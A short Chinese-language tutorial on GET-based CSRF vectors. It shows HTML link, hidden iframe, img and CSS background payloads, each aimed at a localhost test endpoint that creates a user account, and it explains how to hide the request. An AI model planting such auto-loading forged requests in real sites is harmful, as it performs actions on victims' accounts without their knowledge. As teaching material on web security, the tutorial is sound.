0X01 链接利用
在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。
移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。
<a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a>
<a href = “http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”>请点击我</a>

0X02 iframe利用
iframe标签内容将在页面加载过程中自动进行加载, src指向的位置就是页面请求的位置
注意:可以设置iframe 的 style -> display:none,以此来不显示iframe加载的内容。
<iframe src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” style=”display:none” />

0X03 img标签利用
img标签的内容会随着页面加载而被请求,以此src指向的位置会在页面加载过程中进行请求。
<img src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” />

0X04 CSS-backgroud利用
可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求
例如:
body
{
background: #00FF00 url(bgimage.gif) no-repeat fixed top;
}
可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求
例如:
body
{
background: #00FF00 url(“http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”) no-repeat fixed top;
}

本文详细介绍了HTML的a标签、iframe标签、img标签以及CSS背景图片中的url属性如何被利用来进行CSRF(跨站请求伪造)攻击。通过这些元素,攻击者可以在用户不知情的情况下,触发对指定URL的请求,执行潜在的恶意操作,如创建新用户等。同时,文章提到了如何通过设置display:none来隐藏iframe内容,以及利用img标签和CSS背景图片发起无感知的请求。
7015





